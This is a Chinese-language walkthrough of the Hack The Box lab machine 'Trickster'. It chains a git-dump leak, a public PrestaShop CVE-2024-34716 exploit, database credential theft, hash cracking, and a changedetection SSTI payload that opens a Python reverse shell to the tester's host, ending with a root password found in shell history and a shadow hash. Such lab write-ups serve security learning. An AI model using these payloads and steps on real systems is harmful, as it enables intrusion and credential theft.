基本信息
- https://app.hackthebox.com/machines/Trickster
- 10.10.11.34
data:image/s3,"s3://crabby-images/bb045/bb045973464aec88ab5d5ba11a7b42ccc43a2fc8" alt=""
端口扫描
22和80:
1 | nmap -sC -sV -Pn 10.10.11.34 |
80
需要加hosts:
1 | 10.10.11.34 trickster.htb |
一个官网主页,SHOP那里是子域名:
data:image/s3,"s3://crabby-images/0be9e/0be9e00e54a7065ceb1e0e0fdac38df153c8a201" alt=""
SHOP
添加hosts后访问,在线商城,页面底部信息可以知道使用了prestashop:
data:image/s3,"s3://crabby-images/642b4/642b46900afeb495d111df3da5c7f8f7a17ee955" alt=""
目录扫描
常规目录扫描,主站没什么东西,shop发现git泄漏:
1 | gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt -t 50 -u http://trickster.htb/ --exclude-length 278 |
data:image/s3,"s3://crabby-images/ec263/ec263f1ea8d6e0b5080550c988b66fa40706fa3f" alt=""
git
那就dump下来检查:
- arthaud/git-dumper: A tool to dump a git repository from a website
https://github.com/arthaud/git-dumper
1 | git-dumper http://shop.trickster.htb/.git/ shop_git |
得到admin路径,访问也得到了prestashop版本8.1.5:
1 | admin634ewutrx1jgitlooaj |
data:image/s3,"s3://crabby-images/aec8e/aec8e20c5fd2c340d79fd1b173e62b927f237477" alt=""
data:image/s3,"s3://crabby-images/4cc04/4cc044af1a4d8f8a441e1a630e2d860a110a7664" alt=""
prestashop
搜索可以找到相关漏洞:
- CVE-2024-34716 – The Deceptive PNG Trap: Breaking Down the PNG-Driven Chain from XSS to Remote Code Execution on PrestaShop (<=8.1.5) | Ayoub ELMOKHTAR
https://ayoubmokhtar.com/post/png_driven_chain_xss_to_remote_code_execution_prestashop_8.1.5_cve-2024-34716/ - aelmokhtar/CVE-2024-34716
https://github.com/aelmokhtar/CVE-2024-34716
根据实际情况修改代码中的路径端口之类的,以及修改zip文件中的shell php,然后运行exp,等待触发,得到www-data:
1 | python3 exploit.py http://shop.trickster.htb miao@miao.com miao exploit.html |
data:image/s3,"s3://crabby-images/5ba6d/5ba6d7fa16776dd8167f3a60de442fc57ca63e2f" alt=""
信息
然后常规翻文件,得到数据库账号密码:
1 | /var/www/prestashop/app/config/parameters.php |
数据库中继续翻信息得到一些hash:
1 | mysql --user=ps_user --password='prest@shop_o' prestashop -e "select email,passwd from ps_employee" |
其中james的hash可以破解出密码:
1 | sudo hashcat -m 3200 hash.txt ~/Tools/dict/rockyou.txt |
user flag
james用户密码复用,ssh登录:
data:image/s3,"s3://crabby-images/23c4d/23c4d96978c69f764b4b69f1e17677ad147e02e3" alt=""
Docker
查看ip发现还有一个docker的172.17.0.1,枚举docker可以发现172.17.0.1的5000端口,转发出来查看:
1 | ssh james@10.10.11.34 -L 5555:172.17.0.2:5000 |
是一个changedetection 0.45.20,james的密码可以登录:
data:image/s3,"s3://crabby-images/7ac4b/7ac4b114431e8fa2282e7df62d537263d59a6c2c" alt=""
changedetection
搜索可以发现changedetection的漏洞:
- s0ck3t-s3c/CVE-2024-32651-changedetection-RCE: Server-Side Template Injection Exploit
https://github.com/s0ck3t-s3c/CVE-2024-32651-changedetection-RCE
脚本没设置密码选项,根据代码手动利用即可:
添加新更改->edit&watch,监测网址设置成宿主机的,后面控制更改,例如http://172.17.0.1:8000
通知网址设置为get://10.10.14.9,通知正文SSTI Payload
1 | {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{ x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.14.9\",4445));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"/bin/bash\")'").read() }}{% endif %}{% endfor %} |
设置完成后保存,然后到宿主机的我们设置的8000端口监听服务那里,完成任意更改,然后回到检测这里重新检测网站,触发SSTI,得到容器root:
data:image/s3,"s3://crabby-images/747bc/747bcb5d3c9efb8375567c7f51da57c71d232414" alt=""
data:image/s3,"s3://crabby-images/bf16a/bf16ad6c40730bb10a9e29eca123005e5ad2b385" alt=""
data:image/s3,"s3://crabby-images/74be3/74be3e79de370d50d09197a3ab69676a577274df" alt=""
提权信息 & root flag
容器内history可以看到一个疑似密码的,就是宿主机root密码:
1 | #YouC4ntCatchMe# |
data:image/s3,"s3://crabby-images/d8c4e/d8c4ed4d5b24f6c6ac9c511792c7448fabe27174" alt=""
data:image/s3,"s3://crabby-images/f614e/f614e5156968fda9024ead4b4d5b408f87ec04e7" alt=""
shadow
1 | root:$y$j9T$QrqZSRjwrjBfK8HexlK4d/$ng0E/9GWnWgXHLc1TSOBShK3ykz95fGBSVzzw6tiQl2:19968:0:99999:7::: |
参考资料
- arthaud/git-dumper: A tool to dump a git repository from a website
https://github.com/arthaud/git-dumper - CVE-2024-34716 – The Deceptive PNG Trap: Breaking Down the PNG-Driven Chain from XSS to Remote Code Execution on PrestaShop (<=8.1.5) | Ayoub ELMOKHTAR
https://ayoubmokhtar.com/post/png_driven_chain_xss_to_remote_code_execution_prestashop_8.1.5_cve-2024-34716/ - aelmokhtar/CVE-2024-34716
https://github.com/aelmokhtar/CVE-2024-34716 - s0ck3t-s3c/CVE-2024-32651-changedetection-RCE: Server-Side Template Injection Exploit
https://github.com/s0ck3t-s3c/CVE-2024-32651-changedetection-RCE